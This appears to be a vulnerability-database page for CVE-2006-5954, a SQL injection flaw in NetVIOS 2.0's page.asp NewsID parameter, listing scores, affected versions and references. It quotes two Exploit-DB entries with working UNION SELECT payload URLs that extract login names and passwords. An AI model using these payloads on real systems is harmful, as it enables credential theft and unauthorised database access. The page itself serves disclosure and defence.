CVE-2006-5954
published 2006-11-17CVE-2006-5954: SQL injection vulnerability in page.asp in NetVIOS 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the NewsID parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.28%
66.5th percentile
SQL injection vulnerability in page.asp in NetVIOS 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the NewsID parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netvios | netvios | <= 2.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-5q3m-2pg3-4mg8: SQL injection vulnerability in page
ghsa_unreviewed·2022-05-01
CVE-2006-5954 [HIGH] GHSA-5q3m-2pg3-4mg8: SQL injection vulnerability in page
SQL injection vulnerability in page.asp in NetVIOS 2.0 and earlier allows remote attackers to execute arbitrary SQL commands via the NewsID parameter.
GHSA
GHSA-gv2p-3jrh-jp65: SQL injection vulnerability in News/page
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-1566 [HIGH] GHSA-gv2p-3jrh-jp65: SQL injection vulnerability in News/page
SQL injection vulnerability in News/page.asp in NetVIOS Portal allows remote attackers to execute arbitrary SQL commands via the NewsID parameter. NOTE: this issue might be the same as CVE-2006-5954.
No detection rules found.
Exploit-DB
NetVIOS Portal - 'page.asp' SQL Injection
exploitdb·2007-03-19
CVE-2007-1566 NetVIOS Portal - 'page.asp' SQL Injection
NetVIOS Portal - 'page.asp' SQL Injection
---
# Title : NetVios Portal (page.asp) Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptaty.net/netvios-portal.html
# $$ : Free
#S.Page : http://www.netvios.com
http://[target]/[path]/News/page.asp?NewsID=[SQL]
Example:
//News/page.asp?NewsID=-1 union select 0,1,2,loginname,password,5,6,7 from users where userId=1
"""""""""""""""""""""
greetz : VoLqaN, x-MastER
"""""""""""""""""""""
# milw0rm.com [2007-03-19]
Exploit-DB
NetVIOS 2.0 - 'page.asp' SQL Injection
exploitdb·2006-11-14
CVE-2007-1566 NetVIOS 2.0 - 'page.asp' SQL Injection
NetVIOS 2.0 - 'page.asp' SQL Injection
---
# Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability
# Author : ajann
###http://[target]/[path]//page.asp?NewsID=[SQL]
Example:
//page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-14]
No writeups or analysis indexed.
http://secunia.com/advisories/22901http://www.osvdb.org/30411http://www.securityfocus.com/bid/21088http://www.vupen.com/english/advisories/2006/4517https://exchange.xforce.ibmcloud.com/vulnerabilities/30277https://www.exploit-db.com/exploits/2780http://secunia.com/advisories/22901http://www.osvdb.org/30411http://www.securityfocus.com/bid/21088http://www.vupen.com/english/advisories/2006/4517https://exchange.xforce.ibmcloud.com/vulnerabilities/30277https://www.exploit-db.com/exploits/2780
2006-11-17
Published